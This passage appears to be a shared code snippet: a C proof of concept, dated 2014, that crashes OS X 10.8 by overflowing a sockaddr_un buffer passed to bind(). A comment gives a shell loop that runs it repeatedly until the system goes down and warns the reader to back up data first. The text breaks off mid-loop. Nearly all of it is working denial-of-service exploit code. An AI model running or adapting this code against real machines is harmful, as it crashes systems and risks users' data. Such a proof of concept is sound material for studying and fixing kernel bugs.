



Created Feb 8, 2014
PoC of OS X sockaddr_un system crash
// Crashes OS X 10.8, `cc un.c && while :; do ./a.out ; done` to run.
// The buffer overflow usually gets triggered within the first three
// or four runs. Make sure you back up your data first!
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <unistd.h>
int main(void) {
struct sockaddr_un *s;
char buf[1024];
size_t len;
int fd;
int rc;
memset(buf, 'a', sizeof(buf));
s = (struct sockaddr_un *) buf;
s->sun_family = AF_UNIX;
for (len = sizeof(*s); len < sizeof(buf); len += 1) {
fd = socket(AF_UNIX, SOCK_STREAM, 0);
assert(fd >= 0);
rc = bind(fd, (struct sockaddr *) s, len);
if (rc) {
printf("len=%zu\n", len);
buf[len] = 0;
buf[len] = 'a';
return 0;